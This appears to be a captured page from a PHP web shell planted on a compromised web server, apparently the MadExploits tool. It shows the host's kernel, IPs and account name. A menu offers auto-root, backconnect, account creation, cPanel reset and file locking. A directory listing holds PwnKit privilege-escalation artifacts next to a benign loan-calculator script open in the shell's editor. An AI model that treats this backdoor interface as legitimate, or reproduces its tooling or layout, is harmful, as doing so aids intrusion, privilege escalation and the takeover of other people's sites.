Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.191.185.51
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Refinance /
calculator /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
bootstrap.bundle.min.js
78.54
KB
-rw-r--r--
calculator.css
18.83
KB
-rw-r--r--
custom.js
13.31
KB
-rw-r--r--
icon-1.1.png
1.56
KB
-rw-r--r--
icon-1.2.png
1.19
KB
-rw-r--r--
icon-2.1.png
1.63
KB
-rw-r--r--
icon-2.2.png
1.19
KB
-rw-r--r--
icon-3.1.png
1.46
KB
-rw-r--r--
icon-3.2.png
1.12
KB
-rw-r--r--
icon-4.1.png
1.43
KB
-rw-r--r--
icon-4.2.png
815
B
-rw-r--r--
icon-5.1.png
1.37
KB
-rw-r--r--
icon-5.2.png
931
B
-rw-r--r--
icon-6.1.png
1.13
KB
-rw-r--r--
icon-6.2.png
722
B
-rw-r--r--
icon-7.1.png
2.11
KB
-rw-r--r--
icon-7.2.png
1.19
KB
-rw-r--r--
jquery-3.6.0.min.js
87.4
KB
-rw-r--r--
jquery.nice-select.min.js
2.87
KB
-rw-r--r--
nouislider.min.js
25.47
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
slick.min.js
41.86
KB
-rw-r--r--
wNumb.js
2.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
(function($) { "use strict"; $(document).ready(function() { $('select').niceSelect(); $(".jq-next").on('click', function() { $(".Step-1").hide(); $(".Step-2").show(); $(".lone-da").removeClass("active"); $(".verify-w").addClass("active"); }); $(".jq-Back").on('click', function() { $(".Step-2").hide(); $(".Step-1").show(); $(".verify-w").removeClass("active"); $(".lone-da").addClass("active"); }); }); // ------- Emi Calculator --------- // var SelectedAmount, selectedTime = {}, RateOfInterestTime, RateOfInterestAmount; if (typeof wNumb !== "undefined") { var AmountFormat = wNumb({ decimals: 0, thousand: ",", prefix: "$ ", }); var TimeFormatMonths = wNumb({ prefix: " months", }); var TimeFormatYears = wNumb({ prefix: " months", }); } //Slider Elements var mySlider = document.getElementById("RangeSlider"); var mySliderMonth = document.getElementById("MonthRangeSlider"); var mySliderYear = document.getElementById("YearRangeSlider"); //-----home page 1 var SliderAmount = document.getElementById("SliderAmount"); var SliderPeriod = document.getElementById("SliderPeriod"); function clickOnPip(sliderName, This) { var value = Number(This.getAttribute("data-value")); sliderName.noUiSlider.set(value); } function SetPipsOnSlider(PipsName, sliderName) { for (var i = 0; i < PipsName.length; i++) { PipsName[i].style.cursor = "pointer"; PipsName[i].addEventListener("click", function() { clickOnPip(sliderName, this); }); } } // Activate Range Sliders if (mySlider && mySliderMonth && mySliderYear) { noUiSlider.create(mySlider, { start: [15000], connect: "lower", range: { min: 5000, max: 150000, }, format: wNumb({ decimals: 0, thousand: ",", prefix: "$ ", }), pips: { mode: "values", density: 100, values: [5000, 25000, 50000, 75000, 100000, 125000, 150000], stepped: true, format: wNumb({ encoder: function(a) { return a / 1000; }, decimals: 0, prefix: "$", suffix: "k", }), }, }); noUiSlider.create(mySliderMonth, { start: [18], connect: "lower", range: { min: 12, max: 48, }, format: wNumb({ decimals: 0, suffix: " Months", }), pips: { mode: "values", density: 100, values: [12, 18, 24, 30, 36, 42, 48], stepped: true, format: wNumb({ decimals: 0, }), }, }); noUiSlider.create(mySliderYear, { start: [2], connect: "lower", range: { min: 2, max: 8, }, format: wNumb({ decimals: 0, suffix: " Years", }), pips: { mode: "values", density: 100, values: [2, 3, 4, 5, 6, 7, 8], stepped: true, format: wNumb({ decimals: 0, }), }, }); //Slider Pips var pips = mySlider.querySelectorAll(".noUi-value"); var pipsMonth = mySliderMonth.querySelectorAll(".noUi-value"); var pipsYear = mySliderYear.querySelectorAll(".noUi-value"); //Slider Input Element var inputMonthFormat = document.getElementById("SetMonthRange"); var inputFormat = document.getElementById("SetRange"); SetPipsOnSlider(pips, mySlider); SetPipsOnSlider(pipsMonth, mySliderMonth); SetPipsOnSlider(pipsYear, mySliderYear); mySlider.noUiSlider.on("update", function(values, handle) { inputFormat.value = values[handle]; SelectedAmount = AmountFormat.from(values[handle]); CalculateAmount(); }); inputFormat.addEventListener("change", function() { mySlider.noUiSlider.set(this.value); }); if ($("#monthTab.active").length > 0) { mySliderMonth.noUiSlider.on("update", function(values, handle) { inputMonthFormat.value = values[handle]; selectedTime = { type: "month", value: TimeFormatMonths.from(values[handle]), }; CalculateAmount(); }); inputMonthFormat.addEventListener("change", function() { mySliderMonth.noUiSlider.set(this.value); }); } else if ($("#yearTab.active").length > 0) { mySliderYear.noUiSlider.on("update", function(values, handle) { inputMonthFormat.value = values[handle]; selectedTime = { type: "year", value: TimeFormatYears.from(values[handle]), }; CalculateAmount(); }); } inputMonthFormat.addEventListener("change", function() { if ($("#monthTab.active").length > 0) { mySliderMonth.noUiSlider.set(this.value); } else if ($("#yearTab.active").length > 0) { mySliderYear.noUiSlider.set(this.value); } }); $("#yearTab").on("click", function() { mySliderMonth.noUiSlider.off("update", function(values, handle) { inputMonthFormat.value = values[handle]; selectedTime = { type: "month", value: TimeFormatMonths.from(values[handle]), }; CalculateAmount(); }); mySliderYear.noUiSlider.on("update", function(values, handle) { inputMonthFormat.value = values[handle]; selectedTime = { type: "year", value: TimeFormatYears.from(values[handle]), }; CalculateAmount(); }); }); $("#monthTab").on("click", function() { mySliderYear.noUiSlider.off("update", function(values, handle) { inputMonthFormat.value = values[handle]; selectedTime = { type: "year", value: TimeFormatYears.from(values[handle]), }; CalculateAmount(); }); mySliderMonth.noUiSlider.on("update", function(values, handle) { inputMonthFormat.value = values[handle]; selectedTime = { type: "month", value: TimeFormatMonths.from(values[handle]), }; CalculateAmount(); }); }); } if (SliderAmount && SliderPeriod) { noUiSlider.create(SliderAmount, { start: [100000], connect: "lower", range: { min: 5000, max: 250000, }, format: wNumb({ decimals: 0, thousand: ",", prefix: "$ ", }), }); noUiSlider.create(SliderPeriod, { start: [3], connect: "lower", range: { min: 1, max: 5, }, format: wNumb({ decimals: 0, suffix: " year", }), }); var SliderAmountFormat = document.getElementById("SetSliderAmount"); var SliderPeriodFormat = document.getElementById("SetSliderPeriod"); SliderAmount.noUiSlider.on("update", function(values, handle) { SliderAmountFormat.value = values[handle]; }); SliderPeriod.noUiSlider.on("update", function(values, handle) { SliderPeriodFormat.value = values[handle]; }); SliderAmountFormat.addEventListener("change", function() { SliderAmount.noUiSlider.set(this.value); }); SliderPeriodFormat.addEventListener("change", function() { SliderPeriod.noUiSlider.set(this.value); }); } function CalculateAmount() { if (selectedTime.type === "month") { var LoanTime = selectedTime.value; switch (true) { case LoanTime >= 48: RateOfInterestTime = 2.4; break; case LoanTime >= 42: RateOfInterestTime = 2.55; break; case LoanTime >= 32: RateOfInterestTime = 2.7; break; case LoanTime >= 25: RateOfInterestTime = 2.9; break; case LoanTime >= 20: RateOfInterestTime = 3; break; case LoanTime >= 12: RateOfInterestTime = 3.15; break; default: RateOfInterestTime = 0; } } if (selectedTime.type === "year") { var LoanTime = selectedTime.value; switch (true) { case LoanTime >= 8: RateOfInterestTime = 2; break; case LoanTime >= 7: RateOfInterestTime = 2.2; break; case LoanTime >= 6: RateOfInterestTime = 2.3; break; case LoanTime >= 5: RateOfInterestTime = 2.5; break; case LoanTime >= 4: RateOfInterestTime = 2.7; break; case LoanTime >= 3: RateOfInterestTime = 2.9; break; case LoanTime >= 2: RateOfInterestTime = 3.1; break; default: RateOfInterestTime = 0; } } if (typeof SelectedAmount === "number") { var LoanAmount = SelectedAmount; switch (true) { case LoanAmount >= 13e4: RateOfInterestAmount = 2.9; break; case LoanAmount >= 115e3: RateOfInterestAmount = 3.1; break; case LoanAmount >= 1e5: RateOfInterestAmount = 3.3; break; case LoanAmount >= 8e4: RateOfInterestAmount = 3.5; break; case LoanAmount >= 65e3: RateOfInterestAmount = 3.7; break; case LoanAmount >= 5e4: RateOfInterestAmount = 3.8; break; case LoanAmount >= 25e3: RateOfInterestAmount = 3.95; break; case LoanAmount >= 1e4: RateOfInterestAmount = 4; break; default: RateOfInterestAmount = 4.09; } } var TotalRateOfInterest = (RateOfInterestAmount + RateOfInterestTime) / 100; var TotalInterest = SelectedAmount * TotalRateOfInterest; var InterestAndPrincipal = TotalInterest + SelectedAmount; $("#TotalAmount").text(AmountFormat.to(InterestAndPrincipal) + "*"); $("#emiAmount").text( AmountFormat.to(InterestAndPrincipal / selectedTime.value) + "*" ); $("#InterestPayable").text(AmountFormat.to(TotalInterest) + "*"); $("#InterestAmount").text((TotalRateOfInterest * 100).toFixed(2) + " %"); var percent, graphRadius, circumference, strokeDashOffset; var GraphEl = $("#LoanGraph"); percent = (100 * TotalInterest) / InterestAndPrincipal; graphRadius = GraphEl.find($("circle.complete")).attr("r"); circumference = 2 * Math.PI * graphRadius; strokeDashOffset = circumference - (percent * circumference) / 100; GraphEl.find($("circle.complete")) .css({ "stroke-dashoffset": "0", opacity: "0.1" }) .animate({ "stroke-dashoffset": strokeDashOffset, opacity: "1" }, 1250); if ($("#monthTab").hasClass("active")) { $(".active_bar").addClass("left"); } else { $(".active_bar").removeClass("left"); } } // End of Calculator })(jQuery);
Close